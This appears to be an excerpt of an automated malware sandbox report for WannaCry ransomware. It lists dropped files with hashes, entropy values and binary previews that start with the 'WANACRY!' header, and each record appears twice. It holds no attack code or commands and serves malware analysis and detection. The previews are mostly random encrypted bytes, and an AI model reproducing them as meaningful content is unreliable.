                                                                              Preview:WANACRY!......m..w..,...9.yp...E.V..f.gL]d..@.Z....O.D.r.&B.....;l.v.....|..i_....q.3Q...]w(y..Y.1....W.....o.....j./......;,.=_u........K....zre_.>.@QF..5.T.....SJ.`..+..VT.-..).........*x....C:.....V1`%.}.y.E...i....DhF-.7...s.....J......2...|./A...$v...e.0............d.J.i..4.v..;.]..8.D.2~........ms.u....M.;.^.jaq.l..:.......(.6.O...u.....UT..]N..Ng.)].Q...o..P;6,|...?$v.Jx..6..;.A.K.....(./M...;;f.x......fJRlr..R.^...Gh?._u.H.+...:T{[..u2..x..iy..p.~am.%z...b.l[.\...F.b2!?.w........la&....>.8Q..8a...BV......fU...m..S......bn..R.L.Y.n....(K..D&kw..7..r.._#%.@I?$....T.M..G<.G-g~..........(Vg*:6.J.........^......dW..e..bFE..YzN(:...B...SG......g.r.......)..+.._d$.6..eUM.z.H:....F.S.,.]....>...^.Az2..R.k..|.E.I_L...-.<A.2.ko[z.q;g.<!L..Q..............7.....X[.L.....R.!..s0.{X4Y.#."F.Yn.aC.!S!.N5.\.}b6.:.r..7dh.B...!?......#)n..K...Gl.s.......z .ty..J......jz...V...H10....c.(.](......J...,.A.".$.+.b.O.>..eV........t..7i..(....S...K..V..~uv....c.;.7O
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850777315375
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkd0PVC6CV7LI+ly+wwPdrAcW8/Sizf53t2Ra8pHJHRfYB953n+/OvKvmALWIv3Q:bkcVCXV7BI5K0cWFsggFMqumALWIv3xu
                                                                              MD5:7B3BC022029585E49033AC6BF178880C
                                                                              SHA1:A6A91DD5FC190BF7643D79878759E2FD19ED7074
                                                                              SHA-256:FE2FDCF768EA74F5593D132838C228DEA66B91AC15DE5D9D21F710B8763D8F79
                                                                              SHA-512:AE4E627FDEC75B4EC80D2CFA0E6439B8A85C990863CBB57809DEB7FC95FF0E1D3FB3634453B9D73352FA3E9E6E0DEC834E615954D56D272A3B87A1BB09D601E0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Nq..jcGc..b..fU.....n.r...g.{.h._~2h.....6...W.u..L....x.~..5...=.......!y.&......y$.A...`..!....j.4...Xf..?...F.V..O.]QC....OI......A. 4...!_Y..;.&..w6Xg..;...3..fG.I..k...0c...T....L.~3<...>8.x......j.*O.'....q.R...W....'..r.......p..(....r.FZ..............ooKt.....?M.O...@B...y.v."i.cF}.@u6...I2.mp..LY.J.E.>....:0f;.t.=..].Z)G",...p.S.Z$p$..8....b\d...S:..&%.fl-..../.q...~8_..,|T;w>.V....k..1Y.....7.,........2....L4.Q.R..{..jA].0}..&O.{+.....3.R......q..^..P...`..{R.H..(..A. .U......p..5..#d..C....m...)x`.f...c..B;=..=2.........s.=.#....Jy.F'..Q=.u.........f...qlEGW7.{.9.9i..d.c.;.3x......".....+Y.T0D.....>.r......l.c...v4 .o....% U(..E........5Q.a.ka%...t......u...p&...xGq.4..M#..B..o....(.w...P........b~.h.`k.:.........0.X.~.Q..G..,.w>.....E..E..J.N..-|........,.'.v.f.....,..|.oh....j.o. .W.~k.`.G~c..O."....0P...t.o..J1..............V.;j...E..(/# .n.5s.,.........Q.:./.l.v\/i..DO...v........p.j!O.`.kg....7....f...l.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850777315375
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkd0PVC6CV7LI+ly+wwPdrAcW8/Sizf53t2Ra8pHJHRfYB953n+/OvKvmALWIv3Q:bkcVCXV7BI5K0cWFsggFMqumALWIv3xu
                                                                              MD5:7B3BC022029585E49033AC6BF178880C
                                                                              SHA1:A6A91DD5FC190BF7643D79878759E2FD19ED7074
                                                                              SHA-256:FE2FDCF768EA74F5593D132838C228DEA66B91AC15DE5D9D21F710B8763D8F79
                                                                              SHA-512:AE4E627FDEC75B4EC80D2CFA0E6439B8A85C990863CBB57809DEB7FC95FF0E1D3FB3634453B9D73352FA3E9E6E0DEC834E615954D56D272A3B87A1BB09D601E0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Nq..jcGc..b..fU.....n.r...g.{.h._~2h.....6...W.u..L....x.~..5...=.......!y.&......y$.A...`..!....j.4...Xf..?...F.V..O.]QC....OI......A. 4...!_Y..;.&..w6Xg..;...3..fG.I..k...0c...T....L.~3<...>8.x......j.*O.'....q.R...W....'..r.......p..(....r.FZ..............ooKt.....?M.O...@B...y.v."i.cF}.@u6...I2.mp..LY.J.E.>....:0f;.t.=..].Z)G",...p.S.Z$p$..8....b\d...S:..&%.fl-..../.q...~8_..,|T;w>.V....k..1Y.....7.,........2....L4.Q.R..{..jA].0}..&O.{+.....3.R......q..^..P...`..{R.H..(..A. .U......p..5..#d..C....m...)x`.f...c..B;=..=2.........s.=.#....Jy.F'..Q=.u.........f...qlEGW7.{.9.9i..d.c.;.3x......".....+Y.T0D.....>.r......l.c...v4 .o....% U(..E........5Q.a.ka%...t......u...p&...xGq.4..M#..B..o....(.w...P........b~.h.`k.:.........0.X.~.Q..G..,.w>.....E..E..J.N..-|........,.'.v.f.....,..|.oh....j.o. .W.~k.`.G~c..O."....0P...t.o..J1..............V.;j...E..(/# .n.5s.,.........Q.:./.l.v\/i..DO...v........p.j!O.`.kg....7....f...l.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841233806007442
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkeEi4Or3/a3ggW+SX7i8o6kGdQA+fy8rQKB/ime8wId3GLbdoRxg06Zk/:bkeRD/awgW+Sri96o7f5Qy/iCwlV7ZI
                                                                              MD5:17CC28759AE9AF53841525368168405C
                                                                              SHA1:DD5CD3E9D1FA8174B3FD180120E38713A2AD6E53
                                                                              SHA-256:AEB26DA7342B78E7ACB4499B31CA90B85E0EADC150E7D4F79417BC96608285B4
                                                                              SHA-512:CB57E62370C648FF07ED9AB9DEEC25A21C7BB24B4B24F746FBA9C6A3BFBA84E591CC817AF8E7E9BA7BD7D241D0DD113D66CE9843CA7665C9825CEE70AD1DD408
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....fk...>!h.i........j1(9cf.}%......a.:.vr.)u6ya.&I6....k%V.m._l-i.-*N.CIO..Z$...}f...V..*._..-.j..e.w7......U..ae.O.!..km../`..k..TN.....#...}}.]..)w.............P..a.%CR.'7@.......)......u:..t....s.XeU../........D.8.$..O...yZ.|..|w..,..$...jLW................/:{.Q.p.t.xO.8f>....X.f.&.0.7m?......(.;....4v.6x.......1u...'..&.P1..F`c.....G...}.|1......?.w...q...W^-a<..T..V.d=e1.....P.d.....,JJ.......KK....Q....K........>.hx..T..........%.{t.....1..Z.n...n...&L...`....T..9.b..O.q.`L.t.;...h0.a..k.J.[<:.....|.2.8..qS.'.mhC0.K^...F....u.D{.2-R....mW....|..sk.=.w....G...ENY-.;...T..]...w~.1Y..|C..:E.t...+./..#.".....G}.2..j;....L....J$).+..ER...u...5.. Z....&.[....,Zu....R~68t.s.q.9.....Ap,'..!$.{..X1.....9..h.!...V..D.<..F.C...tp.;d..zF...O.w.A.wqu]{....:'....Qp..F..$L<..f.U.. ........|..-..$.h.(9.@.G.1$...i. ....Nv.s.,JD...bo.K.......4....]..QV.\=..vK.Q.9qE.d...j.W..g...C..,..11(..C,..u\.8..L.....C.S.N..U...R.o.....P.}_.t/$i...`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841233806007442
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkeEi4Or3/a3ggW+SX7i8o6kGdQA+fy8rQKB/ime8wId3GLbdoRxg06Zk/:bkeRD/awgW+Sri96o7f5Qy/iCwlV7ZI
                                                                              MD5:17CC28759AE9AF53841525368168405C
                                                                              SHA1:DD5CD3E9D1FA8174B3FD180120E38713A2AD6E53
                                                                              SHA-256:AEB26DA7342B78E7ACB4499B31CA90B85E0EADC150E7D4F79417BC96608285B4
                                                                              SHA-512:CB57E62370C648FF07ED9AB9DEEC25A21C7BB24B4B24F746FBA9C6A3BFBA84E591CC817AF8E7E9BA7BD7D241D0DD113D66CE9843CA7665C9825CEE70AD1DD408
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....fk...>!h.i........j1(9cf.}%......a.:.vr.)u6ya.&I6....k%V.m._l-i.-*N.CIO..Z$...}f...V..*._..-.j..e.w7......U..ae.O.!..km../`..k..TN.....#...}}.]..)w.............P..a.%CR.'7@.......)......u:..t....s.XeU../........D.8.$..O...yZ.|..|w..,..$...jLW................/:{.Q.p.t.xO.8f>....X.f.&.0.7m?......(.;....4v.6x.......1u...'..&.P1..F`c.....G...}.|1......?.w...q...W^-a<..T..V.d=e1.....P.d.....,JJ.......KK....Q....K........>.hx..T..........%.{t.....1..Z.n...n...&L...`....T..9.b..O.q.`L.t.;...h0.a..k.J.[<:.....|.2.8..qS.'.mhC0.K^...F....u.D{.2-R....mW....|..sk.=.w....G...ENY-.;...T..]...w~.1Y..|C..:E.t...+./..#.".....G}.2..j;....L....J$).+..ER...u...5.. Z....&.[....,Zu....R~68t.s.q.9.....Ap,'..!$.{..X1.....9..h.!...V..D.<..F.C...tp.;d..zF...O.w.A.wqu]{....:'....Qp..F..$L<..f.U.. ........|..-..$.h.(9.@.G.1$...i. ....Nv.s.,JD...bo.K.......4....]..QV.\=..vK.Q.9qE.d...j.W..g...C..,..11(..C,..u\.8..L.....C.S.N..U...R.o.....P.}_.t/$i...`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.818360035156625
                                                                              Encrypted:false
                                                                              SSDEEP:24:bke3HE9ldJkdMAgMs9e9LvO7VVWJIbIztPkjp3VUVSu7kGsJo65bh+:bkYHIldJq6wLOVWJNPk93kH7kA65bM
                                                                              MD5:F9A2177C47B0D255E7723E830551D45A
                                                                              SHA1:98E6399A1BEBCBA9E481EC46544A962CB53DE75E
                                                                              SHA-256:25D2F0BF612FE9E6896657BCED653079274234B4A48E69D870FEB0A362CD957E
                                                                              SHA-512:631AFE14F83CAAD921B39F197F0FD18ABD66FD57F1AC62F9962B1710A2900B7517FA730E6D64F22DE26F1CFCCB186D28DE5F0388BED5D18334445CFD565C70C9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G.9.P+..M..S....mL.Lm.}IXXv}.T..r...Y....4m4......VP..a....u.j......:kU... .n....._N..HW`...4.."..mO.....k. .{.jTv`#rYB...|.aDc..j..I"M&ai.....\.....8#/.....Qiv..O.Z./.l.=..U..".\..!..I....|....[#..VI.=L]oG....~.vR.v?.........tt.R...U8.W..%...................f..z....F..c.S...4...S..%B.Y....#4.$...t..7.O...5.W.m..4.qYA.9.....l...:.i.+....k...5......q;..\\......l.v0i._[P.L...g...kA....2.*...\I.W...#.5.Z....0...1....noF.>Y......U(3..:.....?^....[D...N.Ay..P...TH......R.^...O.6s....i..V....MS..j...~&v...{s...+....W.2.!..}....F.z<..,}..J@F..iT.!W......tKw,>=D..l...)..T....cH..CA..f..nC6.....J...a.\.2......o..$...B<)U@%......(...R...........V+..-P....|..d`5.8.sGH.\W.S....%......'{v)...OwI::+..S..w..F-V+."o..Al..J6..xx.&.jK#......rH*RM}...8..'.p.:.W_.~C.7....q%^.*!l.$..19...*.KT../."}.1cZ...9.6C..h..8...9H.G..~.1vy.i0..%C.8..1<...]b.".?.......-...-..T.U9..L.l.y...[}..d]iQ..Y..5..^.].Ar....2<)4.+...."].;..6?..0...(b..h..[+.c_.Bc.T....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.818360035156625
                                                                              Encrypted:false
                                                                              SSDEEP:24:bke3HE9ldJkdMAgMs9e9LvO7VVWJIbIztPkjp3VUVSu7kGsJo65bh+:bkYHIldJq6wLOVWJNPk93kH7kA65bM
                                                                              MD5:F9A2177C47B0D255E7723E830551D45A
                                                                              SHA1:98E6399A1BEBCBA9E481EC46544A962CB53DE75E
                                                                              SHA-256:25D2F0BF612FE9E6896657BCED653079274234B4A48E69D870FEB0A362CD957E
                                                                              SHA-512:631AFE14F83CAAD921B39F197F0FD18ABD66FD57F1AC62F9962B1710A2900B7517FA730E6D64F22DE26F1CFCCB186D28DE5F0388BED5D18334445CFD565C70C9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G.9.P+..M..S....mL.Lm.}IXXv}.T..r...Y....4m4......VP..a....u.j......:kU... .n....._N..HW`...4.."..mO.....k. .{.jTv`#rYB...|.aDc..j..I"M&ai.....\.....8#/.....Qiv..O.Z./.l.=..U..".\..!..I....|....[#..VI.=L]oG....~.vR.v?.........tt.R...U8.W..%...................f..z....F..c.S...4...S..%B.Y....#4.$...t..7.O...5.W.m..4.qYA.9.....l...:.i.+....k...5......q;..\\......l.v0i._[P.L...g...kA....2.*...\I.W...#.5.Z....0...1....noF.>Y......U(3..:.....?^....[D...N.Ay..P...TH......R.^...O.6s....i..V....MS..j...~&v...{s...+....W.2.!..}....F.z<..,}..J@F..iT.!W......tKw,>=D..l...)..T....cH..CA..f..nC6.....J...a.\.2......o..$...B<)U@%......(...R...........V+..-P....|..d`5.8.sGH.\W.S....%......'{v)...OwI::+..S..w..F-V+."o..Al..J6..xx.&.jK#......rH*RM}...8..'.p.:.W_.~C.7....q%^.*!l.$..19...*.KT../."}.1cZ...9.6C..h..8...9H.G..~.1vy.i0..%C.8..1<...]b.".?.......-...-..T.U9..L.l.y...[}..d]iQ..Y..5..^.].Ar....2<)4.+...."].;..6?..0...(b..h..[+.c_.Bc.T....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831602539606564
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjkuoPR8xPysbuALIhSVHbvOjn8vxC28ekZ+tMqPa/Q72Pj:bkjuitNIEVzEn8V8ekZwl/+j
                                                                              MD5:0A89BFD0790A93B8E54960A9F7EE5F7E
                                                                              SHA1:F5D6470955D92CCC14654264C13C133F005D105B
                                                                              SHA-256:338A10B21B6EAAB0722B7343ED4271CB15B7AF35CB6730B8D52445C87A828B25
                                                                              SHA-512:E9E0982C915353B1FBD8CE06B8E203FE437307EBE26B3EE202CCB053755F46A217C220870FD22B0DA6076A86AF50D2CA02E25D1B69E5BAFA897D495741A0D7AD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Du./.kK.....5..q.....<...,....................sS~..q$Tqg.G.@..)!..$.$s. ..;VR.<~>T...m...d..#..V[.....E.Zbr{...c..j...#{.8@Zx....;..-YU.(E0..O..{...-......7..4q.7...4...M4..<...>"@L)IJ=....H.8.Ay.<..y...'.G...}[j.K...D5W.m..T;.......|...P.................i.4.>.<smV...{.....#.tY.>.g.,.v.7..@a.....j)j....0.j.:.........#...^.'.?...g(.5.y.u....w.Y.9........Y,F.....#d=>..a..z}..78...=......2?.t1`.KhB?......f^(..S..e.....=..1Kw./.......%..d$..w.kPJ&..2'b.K......+..2}...t,.`.9........}z...[mu...@....&......i...a...=..D.0....=k.IW.w...)..Y$.....kQ..q..u.......%!..AK..;.S@...+.7._o.....4d...A....IsQ*....8!.....nsp=2l..V...Y....=.Q.......l...Y..A..US........^..?.. ..(....._.o?..$[.bB.....n..?.m....P..p$b..V......pc..f.HDM....m...@.R..R:ZQ.l.-^....>#..z.o!....*R.3Z.*i.....2....G.).......D..^.Z.T..L...J.1^..t...........(.I...C.t...]. ..Q..e.R...N.A......K.e.5..U.^j.y.6..........<Z!.W....<..k2=....1.]..cS.=..$$..-.m8be..u.....k
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831602539606564
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjkuoPR8xPysbuALIhSVHbvOjn8vxC28ekZ+tMqPa/Q72Pj:bkjuitNIEVzEn8V8ekZwl/+j
                                                                              MD5:0A89BFD0790A93B8E54960A9F7EE5F7E
                                                                              SHA1:F5D6470955D92CCC14654264C13C133F005D105B
                                                                              SHA-256:338A10B21B6EAAB0722B7343ED4271CB15B7AF35CB6730B8D52445C87A828B25
                                                                              SHA-512:E9E0982C915353B1FBD8CE06B8E203FE437307EBE26B3EE202CCB053755F46A217C220870FD22B0DA6076A86AF50D2CA02E25D1B69E5BAFA897D495741A0D7AD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....Du./.kK.....5..q.....<...,....................sS~..q$Tqg.G.@..)!..$.$s. ..;VR.<~>T...m...d..#..V[.....E.Zbr{...c..j...#{.8@Zx....;..-YU.(E0..O..{...-......7..4q.7...4...M4..<...>"@L)IJ=....H.8.Ay.<..y...'.G...}[j.K...D5W.m..T;.......|...P.................i.4.>.<smV...{.....#.tY.>.g.,.v.7..@a.....j)j....0.j.:.........#...^.'.?...g(.5.y.u....w.Y.9........Y,F.....#d=>..a..z}..78...=......2?.t1`.KhB?......f^(..S..e.....=..1Kw./.......%..d$..w.kPJ&..2'b.K......+..2}...t,.`.9........}z...[mu...@....&......i...a...=..D.0....=k.IW.w...)..Y$.....kQ..q..u.......%!..AK..;.S@...+.7._o.....4d...A....IsQ*....8!.....nsp=2l..V...Y....=.Q.......l...Y..A..US........^..?.. ..(....._.o?..$[.bB.....n..?.m....P..p$b..V......pc..f.HDM....m...@.R..R:ZQ.l.-^....>#..z.o!....*R.3Z.*i.....2....G.).......D..^.Z.T..L...J.1^..t...........(.I...C.t...]. ..Q..e.R...N.A......K.e.5..U.^j.y.6..........<Z!.W....<..k2=....1.]..cS.=..$$..-.m8be..u.....k
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84962211487145
                                                                              Encrypted:false
                                                                              SSDEEP:24:bknRZevd8MWCW8gPaveFdlOGY/FTLbTb1ibGX7NtIOaUp10lN49:bkRZu0Mo+F7TbYGx+VUb0O
                                                                              MD5:847C87056D762A7E313E156C705DBBB9
                                                                              SHA1:484333FCABAD8B25DE7D6AB2B08B9FC2BDAA08B1
                                                                              SHA-256:9BBFC29EA03A9F5B421CFB97D96DDD7005144CBEDA2AA81A0994FCE3EDC9B2BC
                                                                              SHA-512:E99ECDF044E52B12F77A939E8E48E971BF1788E5B693C758B51B86C9A6BA52026B9C8479ECCC08256EDD876A015993D41E7E92A602DF7227BE10001DA231CF74
                                                                              Malicious:false
                                                                              Preview:WANACRY!......0.B}>G)..[w.:..0......2.uIy...Z\.......a.0c>.X.........X.y.......=-.'c...=.-.........tk5.........r...U..j.O._.{......+.....^a...SJ.I9.u.d.F@|.,..Ts...y.i@)'.7...S?h.....8..[..~.^`..!.....lzj^....h1~........ O....R.j....H..A.9)>..{..3.....H^.I<........................y...C...9e...........r..n...Y../)*4.j...r2A....n[.BC...SX...p.....n.O7..n....s.....^...d.........?...?u-....U.....I.xB..DU..../.qQ`:.......+..U.sFy.a.O/.}.8...ee|...j....H.[6%O..&..C .I.W.i....+k...~..A.=...?..p.[....={(..g\.l......,....!.....Fxa... .....E~.b..@,Oj.&P.W..t.....v'....9k... \..%...]n..M.=+..2'..'JT.....s7.?..j..q."..&.....).`+..$P.R...tR.d..a&.."...zy..s.opU%...J..i#.dW`..X.\.x...5 .O.RQU)T...-wF.....n.....+a.......3."E......+$f"."()]..d..f..X..U..u.l>...O....4.......~.R?U1?......$..(..7..wga..Y.sz.5gA%9....K..IO.;.F..-..wna.P...o$;`/.....00&<_M..0...L...M...QH.Q.m.X..J.!.T.i.......W2..X"V.%=,.......@.6.N.M..=..b...#.].HV....v..?i..be..L..B.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84962211487145
                                                                              Encrypted:false
                                                                              SSDEEP:24:bknRZevd8MWCW8gPaveFdlOGY/FTLbTb1ibGX7NtIOaUp10lN49:bkRZu0Mo+F7TbYGx+VUb0O
                                                                              MD5:847C87056D762A7E313E156C705DBBB9
                                                                              SHA1:484333FCABAD8B25DE7D6AB2B08B9FC2BDAA08B1
                                                                              SHA-256:9BBFC29EA03A9F5B421CFB97D96DDD7005144CBEDA2AA81A0994FCE3EDC9B2BC
                                                                              SHA-512:E99ECDF044E52B12F77A939E8E48E971BF1788E5B693C758B51B86C9A6BA52026B9C8479ECCC08256EDD876A015993D41E7E92A602DF7227BE10001DA231CF74
                                                                              Malicious:false
                                                                              Preview:WANACRY!......0.B}>G)..[w.:..0......2.uIy...Z\.......a.0c>.X.........X.y.......=-.'c...=.-.........tk5.........r...U..j.O._.{......+.....^a...SJ.I9.u.d.F@|.,..Ts...y.i@)'.7...S?h.....8..[..~.^`..!.....lzj^....h1~........ O....R.j....H..A.9)>..{..3.....H^.I<........................y...C...9e...........r..n...Y../)*4.j...r2A....n[.BC...SX...p.....n.O7..n....s.....^...d.........?...?u-....U.....I.xB..DU..../.qQ`:.......+..U.sFy.a.O/.}.8...ee|...j....H.[6%O..&..C .I.W.i....+k...~..A.=...?..p.[....={(..g\.l......,....!.....Fxa... .....E~.b..@,Oj.&P.W..t.....v'....9k... \..%...]n..M.=+..2'..'JT.....s7.?..j..q."..&.....).`+..$P.R...tR.d..a&.."...zy..s.opU%...J..i#.dW`..X.\.x...5 .O.RQU)T...-wF.....n.....+a.......3."E......+$f"."()]..d..f..X..U..u.l>...O....4.......~.R?U1?......$..(..7..wga..Y.sz.5gA%9....K..IO.;.F..-..wna.P...o$;`/.....00&<_M..0...L...M...QH.Q.m.X..J.!.T.i.......W2..X"V.%=,.......@.6.N.M..=..b...#.].HV....v..?i..be..L..B.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848718546463525
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk38VM+TSi1eJmeQwXgMUjg72LYPx3/85FxaJGzHaEzl8ucLl7WF+GmrgkIOP/:bkMV1SMCMg7zZ/85LTbaokKqtFH
                                                                              MD5:2A04D4235923C85D934D1318528333EF
                                                                              SHA1:1197BA935FE48D8B4AA21AAF1AEB8F14D53BC645
                                                                              SHA-256:B9379983C810DB150D4E0433EB0FCF09B8C798C0FCDAC391E5F389AD3312B91C
                                                                              SHA-512:01EE4AAA3189860D7A313485229BA7AE89191966D090639E51E2C4A4B355B1497AB70006948667D7218354FFAD0AA7F3A3249015EA367798A3ED7266693B4847
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....l..3...E......^|....v4......b&..^a".^Yk...t.3.\......X...]B.....].......l.J.)...P.^U...#z.....L.m......W..U.....).....f..ky."<......J).......^!T.U..............`..;].1uI...s.y'.93;3.T...s........3j..8.z@.m..>R\.4.A..;Jn.:..1.X.UY.=*$.e ;..&...............@?.uh..VQ.u....E/'7 .U....;.2.....,).2....g.|u....!-k.LNz...nF.5..7.....B.s|.4.....M.`3..H.e|...../..M..._....P.....|.....u%.&../..5.../.R-."...[..]!..h...&.j1..07A...CH?]..j.P.:.....M...b...7b..F....0.qR......a.."Q+.M.....\@./...2...6.N.|o.?.ndy......XW.I.....JF._FgSK9L~.Nv.,...d.G...]@x.?.........=J....4.....v.........`...L.;.W=.....:...k..)....=.@.l.~.F.d.z...S.(....j.Iu\6j..f..:...q...P_....m.A.A.7.. /..N.`33..~--..>#...T.^S..{k...RL42.W..E.=........3[.'.Q.......j...X....)...J..d....2.....R..p..t&...|..I.'0$,d..+^....U_...)Q.$I.R...ti.....l..tav...].fxY3.m.3..Z...c.^..{.H.......t.`...]..[...h...5..p..'.m...?.......K.32d.....ZY.G......P........ou+......3......}.4.....&'B
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848718546463525
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk38VM+TSi1eJmeQwXgMUjg72LYPx3/85FxaJGzHaEzl8ucLl7WF+GmrgkIOP/:bkMV1SMCMg7zZ/85LTbaokKqtFH
                                                                              MD5:2A04D4235923C85D934D1318528333EF
                                                                              SHA1:1197BA935FE48D8B4AA21AAF1AEB8F14D53BC645
                                                                              SHA-256:B9379983C810DB150D4E0433EB0FCF09B8C798C0FCDAC391E5F389AD3312B91C
                                                                              SHA-512:01EE4AAA3189860D7A313485229BA7AE89191966D090639E51E2C4A4B355B1497AB70006948667D7218354FFAD0AA7F3A3249015EA367798A3ED7266693B4847
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....l..3...E......^|....v4......b&..^a".^Yk...t.3.\......X...]B.....].......l.J.)...P.^U...#z.....L.m......W..U.....).....f..ky."<......J).......^!T.U..............`..;].1uI...s.y'.93;3.T...s........3j..8.z@.m..>R\.4.A..;Jn.:..1.X.UY.=*$.e ;..&...............@?.uh..VQ.u....E/'7 .U....;.2.....,).2....g.|u....!-k.LNz...nF.5..7.....B.s|.4.....M.`3..H.e|...../..M..._....P.....|.....u%.&../..5.../.R-."...[..]!..h...&.j1..07A...CH?]..j.P.:.....M...b...7b..F....0.qR......a.."Q+.M.....\@./...2...6.N.|o.?.ndy......XW.I.....JF._FgSK9L~.Nv.,...d.G...]@x.?.........=J....4.....v.........`...L.;.W=.....:...k..)....=.@.l.~.F.d.z...S.(....j.Iu\6j..f..:...q...P_....m.A.A.7.. /..N.`33..~--..>#...T.^S..{k...RL42.W..E.=........3[.'.Q.......j...X....)...J..d....2.....R..p..t&...|..I.'0$,d..+^....U_...)Q.$I.R...ti.....l..tav...].fxY3.m.3..Z...c.^..{.H.......t.`...]..[...h...5..p..'.m...?.......K.32d.....ZY.G......P........ou+......3......}.4.....&'B
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85041431821635
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkQSHxcorhwlapCHN7h/BYyjUuDCYSmb6GURLZWCbnfSTj8xEzVxKiYHf:bknRcvUIHWyjUuD4C6GUlTnfS8xE5XM
                                                                              MD5:89E78D408A60BC52F138C1BB68B52785
                                                                              SHA1:16B3994E3E1C2C6DAFC62873FE3847F1DF7545FF
                                                                              SHA-256:458E07F3F545992EF59BA00B9101A9048206DAAF04A8795E0995BACBDD93A8F1
                                                                              SHA-512:89CAEA9B24E0C5322723EE018B5AD8F06B8FB79F641F35C10A90BFA213A82DE78E646D6A851C254CDBEB093F28AEDC2DF107B7B6BE13CA5DE8E262B718D31814
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........J;8q.JR6.....hI..-...DU'....'...]8......H<...0.LB.*.<Z...kA....;x..W`...v.....e.?.?. ....=....(Q\.|.5.*'E.Kj...A....._....R...S.'.6....sz]....sB.N<.!q......[....../.....r....Mh.9.f.... ..Q.....f.9./......... ..#bF.%.i.J`._....F.Z..............%.aU...q...$..K..n..|.r.......!.Z........_..Q...'^!..o.M.=.d...E....y6>./<=......u] ..&.L.2\i.......u[.$.......q...$.gcr.J....a. .-`....0..^1...d........"9*......^)F.Z.5..>....E<..B...}.....p......2.C..P]y.).X ..X.......\"....j.J.e..g..;.wr;]..e>j..h.-.)$.Wb.E.e%.7.!..%...........-$.x.qE.eP}.#..K.w.s7f.Q..W'H....1.....k..u...a.j.14.c..}8m..B..J./....$..g.....8#...1.....2.......6..[].Bi4.~....L.P.;.......^Fz....u8?..;...%.......R.1.Dx...}..L..\..K..p.gP.6.4V.,)..Yfi.S.aA....|.....h...A.u/A.5..U.Q....=A.O..gm.-:...,...n.4.I.2..}....@.WG-.z:....M=.4sSo.g={H..g.&..Z\.r>.*...s..........KC}m.d...1."{....NA./p..fON..ymB..L.v.C../T.K.8.....~k$.L.9O.,.#.A.....bFB.|......9.....j6..q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85041431821635
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkQSHxcorhwlapCHN7h/BYyjUuDCYSmb6GURLZWCbnfSTj8xEzVxKiYHf:bknRcvUIHWyjUuD4C6GUlTnfS8xE5XM
                                                                              MD5:89E78D408A60BC52F138C1BB68B52785
                                                                              SHA1:16B3994E3E1C2C6DAFC62873FE3847F1DF7545FF
                                                                              SHA-256:458E07F3F545992EF59BA00B9101A9048206DAAF04A8795E0995BACBDD93A8F1
                                                                              SHA-512:89CAEA9B24E0C5322723EE018B5AD8F06B8FB79F641F35C10A90BFA213A82DE78E646D6A851C254CDBEB093F28AEDC2DF107B7B6BE13CA5DE8E262B718D31814
                                                                              Malicious:false
